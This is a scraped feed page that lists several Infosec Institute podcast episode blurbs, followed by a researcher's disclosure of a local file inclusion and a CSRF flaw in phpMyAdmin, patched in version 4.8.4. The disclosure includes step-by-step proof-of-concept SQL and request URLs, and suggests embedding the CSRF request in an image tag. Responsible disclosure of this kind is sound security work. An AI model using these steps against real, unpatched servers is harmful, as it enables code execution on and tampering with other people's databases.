❌

Reading view

There are new articles available, click to refresh the page.

How to Become a Security Architect | Guest Leighton Johnson

Learn about the life of a security architect in this discussion with Leighton Johnson, the CTO and founder of ISFMT (Information Security Forensics Management Team). Leighton discusses how you can become a security architect, the typical job responsibilities and common pitfalls you may face, certifications that can help advance your security architect career, how security architecture is evolving, and more.

– Start learning cybersecurity for free: https://www.infosecinstitute.com/free
– View Cyber Work Podcast transcripts and additional episodes: https://www.infosecinstitute.com/podcast

The $9 Billion BEC Threat You Can’t Ignore | Guests Roger Sels and Jack Koziol

Business email compromise (BEC) attacks are expected to cost businesses $9 billion by the end of 2018, according to Trend Micro estimates. In this discussion with Roger Sels, VP information security at DarkMatter, and Jack Koziol, CEO of Infosec Institute, you'll learn more about BEC attacks and measures you can take now to protect your organization. Kristin Zurovitch, director of marketing at Infosec Institute, helps guide the discussion and takes listener questions.

– Start learning cybersecurity for free: https://www.infosecinstitute.com/free
– View Cyber Work Podcast transcripts and additional episodes: https://www.infosecinstitute.com/podcast

How to Become an Incident Responder | Guest Keatron Evans

Learn about the path to becoming an incident responder and what a potential career may entail in this discussion with Keatron Evans, Infosec Institute instructor and managing consultant at KM Cyber Security, LLC. Evans discusses his path to incident response, what kinds of interests can translate into a successful incident response career, and what a day in the life as an incident responder is like.

– Start learning cybersecurity for free: https://www.infosecinstitute.com/free
– View Cyber Work Podcast transcripts and additional episodes: https://www.infosecinstitute.com/podcast

PMP Certification: Boost Your Career and Earn More Money | Guest Chris Danek

Earning your PMP certification can increase your earnings by as much as 20 percent. A Project Management Professional (PMP) certification proves to employers that you know what it takes to manage projects efficiently, within budget and on schedule. Infosec Institute instructor Chris Danek and sales manager Jarrod Mayes discuss how the PMP certification process works and how it can help build your credibility in any industry. Kristin Zurovitch, director of marketing at Infosec Institute, helps guide the discussion and takes listener questions. I

– Start learning cybersecurity for free: https://www.infosecinstitute.com/free
– View Cyber Work Podcast transcripts and additional episodes: https://www.infosecinstitute.com/podcast

The Problem with Passwords | Guest Susan Morrow

Passwords remain at the heart of many cybersecurity issues, and this week we take a deep dive into the topic with Susan Morrow, who has worked in numerous areas of the IT security industry since the early 1990s. Morrow discusses the new NIST password guidelines, how organizations are lagging behind, and a variety of other password-related topics. The InfoSec Institute security awareness series highlights the importance of security education across all levels of an organization.

– Start learning cybersecurity for free: https://www.infosecinstitute.com/free
– View Cyber Work Podcast transcripts and additional episodes: https://www.infosecinstitute.com/podcast

Privacy Certifications Boosted by New Regulations | Guest Aaron Stevens

California’s new privacy law will affect more than half a million U.S. companies when it goes into effect on January 1, 2020 β€” and that's just one piece of the evolving privacy landscape. In this discussion with IAPP channels manager Aaron Stevens, we discuss how organizations are being impacted by privacy regulations, the surging popularity of privacy certifications, and how an IAPP privacy certification can help boost your career.

– Start learning cybersecurity for free: https://www.infosecinstitute.com/free
– View Cyber Work Podcast transcripts and additional episodes: https://www.infosecinstitute.com/podcast

How to Become a Computer Forensics Investigator | Guest Amber Schroader

Paraben CEO Amber Schroader discusses her path to becoming a computer forensics investigator and provides advice to those who may be considering computer forensics as a career. Schroader talks about the challenges of the field, the misconceptions and growth brought about by TV shows, and the fact that forensics is a science rather than an art.

– Start learning cybersecurity for free: https://www.infosecinstitute.com/free
– View Cyber Work Podcast transcripts and additional episodes: https://www.infosecinstitute.com/podcast

CRISC Roadmap: The Highest-Paying Certification | Guest Leighton Johnson

Professionals with the Certified in Risk and Information Systems Control (CRISC) certification earn an average of $127,507 each year, making it the highest-paying IT certification available. Leighton Johnson, the CTO of Information Security Forensics Management Team and a CRISC-certified professional, discusses how earning your CRISC can open new career opportunities, as well as what the CRISC certification process is like. Kristin Zurovitch, director of marketing at Infosec Instiute, helps guide the discussion and takes listener questions.

– Start learning cybersecurity for free: https://www.infosecinstitute.com/free
– View Cyber Work Podcast transcripts and additional episodes: https://www.infosecinstitute.com/podcast

Post GDPR Best Practices | Guest Susan Morrow

It's been three months since the EU's General Data Protection Regulation (GDPR) went into effect. Returning guest Susan Morrow and host Chris Sienko take a look back at the initial rollout of GDPR, the compliance steps organizations have taken so far, and the potential future impact of GDPR.

– Start learning cybersecurity for free: https://www.infosecinstitute.com/free
– View Cyber Work Podcast transcripts and additional episodes: https://www.infosecinstitute.com/podcast

How to Become a Network Admin | Guest Elias Papatestas

Learn about the path to becoming a network admin and what a potential career may entail in this discussion with Elias Papatestas, an Infosec Institute instructor who has extensive history in the IT industry dating back to the 1980s.

– Start learning cybersecurity for free: https://www.infosecinstitute.com/free
– View Cyber Work Podcast transcripts and additional episodes: https://www.infosecinstitute.com/podcast

Cybersecurity Startups and Minority Representation | Guest Ron Gula

Ron Gula, president of Gula Tech Adventures and co-founder of Tenable Network Security, talks about the evolution of cybersecurity and security awareness, his career shift from the NSA to growing Tenable to funding other cybersecurity startups, and a variety of other topics.

– Start learning cybersecurity for free: https://www.infosecinstitute.com/free
– View Cyber Work Podcast transcripts and additional episodes: https://www.infosecinstitute.com/podcast

PHPMyAdmin multiple vulnerabilities

During an assignment, I found several serious vulnerabilities in phpMyAdmin, which is an application massively used to manage MariaDB and MySQL databases.Β One of them potentially leads to arbitrary code execution by exploiting a Local file inclusion, while the other is a CSRF allowing any table entry to be edited.

1. Local File INCLUSION in transformation feature

The transformation feature from PHPMyAdmin allows to have a specific display for some columns when selecting them from a table. For example, it can transform links in text format to clickable links when rendering them.

Those transformations are defined in PHPMyAdmin’s β€œcolumn_info” system table, which usually resides in the phpmyadmin database. However, every database can ship its own version of phpmyadmin system tables. For creating phpmyadmin system tables for a specific database, the following call can be used: http://phpmyadmin/chk_rel.php?fixall_pmadb=1&db=*yourdb*.
It will create a set of pma__* tables into your database.

Here is an example of how the transformation is applied, from tbl_replace.php:

<?php

$mime_map = Transformations::getMIME($GLOBALS['db'], $GLOBALS['table']);
[...]
// Apply Input Transformation if defined
if (!empty($mime_map[$column_name])
&& !empty($mime_map[$column_name]['input_transformation'])
) {
   $filename = 'libraries/classes/Plugins/Transformations/'
. $mime_map[$column_name]['input_transformation'];
   if (is_file($filename)) {
      include_once $filename;
      $classname = Transformations::getClassName($filename);
      /** @var IOTransformationsPlugin $transformation_plugin */
      $transformation_plugin = new $classname();
      $transformation_options = Transformations::getOptions(
         $mime_map[$column_name]['input_transformation_options']
      );
      $current_value = $transformation_plugin->applyTransformation(
         $current_value, $transformation_options
      );
      // check if transformation was successful or not
      // and accordingly set error messages & insert_fail
      if (method_exists($transformation_plugin, 'isSuccess')
&& !$transformation_plugin->isSuccess()
) {
         $insert_fail = true;
         $row_skipped = true;
         $insert_errors[] = sprintf(
            __('Row: %1$s, Column: %2$s, Error: %3$s'),
            $rownumber, $column_name,
            $transformation_plugin->getError()
         );
      }
   }
}

The transformation is fetched from the β€œpma__column_info” system table in the current database, or from the β€œphpmyadmin” database instead. The β€œinput_transformation” column is used as a filename to include, and is vulnerable to a path traversal that leads to a local file inclusion.

Here is a PoC to exploit this vulnerability:

  1. Create a new database β€œfoo” with a random β€œbar” table containing a β€œbaz” column, with a data containing PHP code in it (to fill the session with some php code):
    CREATE DATABASE foo;
    Β CREATE TABLE foo.bar ( baz VARCHAR(255) PRIMARY KEY );
    Β INSERT INTO foo.bar SELECT '<?php phpinfo() ?>';
  2. Create phpmyadmin system tables in your db by calling http://phpmyadmin/chk_rel.php?fixall_pmadb=1&db=foo
  3. Fill the transformation information with the path traversal in the β€œpma__column_info” table:
    INSERT INTO `pma__column_info`SELECT '1', 'foo', 'bar', 'baz', 'plop',
    Β 'plop', 'plop', 'plop',
    Β '[path_traversal]/var/lib/php/sessions/sess_{yourSessionId}','plop';
  4. Browsing toΒ http://phpmyadmin/tbl_replace.php?db=foo&table=bar&where_clause=1=1&fields_name[multi_edit][][]=baz&clause_is_unique=1 will trigger the phpinfo(); call.

Β 

2. CSRF for updating data in table

This vulnerability is pretty easy to understand. A simple GET request can be used to update data in a table. Here is an example :

http://phpmyadmin/tbl_replace.php?db=*yourDB*&table=*yourTable*&fields_name[multi_edit][0][0]=*fieldToEdit*&fields[multi_edit][0][0]=*fieldNewValue*&clause_is_unique=1&where_clause=*whereClause*

A malicious user could force a logged-in user to update arbitrary tables in arbitrary DBs. This can also be used in a simple <img> element on forums or elsewhere, as the request is a simple GET one.

Β 

These vulnerabilities are both important. We responsibly disclosed them and theyΒ  were patched on the newly released phpMyAdmin 4.8.4.

Β 

Timeline :

  • 2018.06.21 – Initial contact with phpMyAdmin security team.
  • 2018.06.24 – Initial response that the team will investigate.
  • 2018.08.02 – Request for news.
  • 2018.08.28 – Re-request for news.
  • 2018.08.31 – Response from phpMyAdmin team that they’re still in the process of fixing things.
  • 2018.11.01 – Request for news.
  • 2018.12.07 – Apologies from phpMyAdmin + explanation that a lot of code rewrite was necessary for multiple CSRF flaws.
  • 2018.12.11 – New version released with patch.

Update your things! πŸ˜‰

❌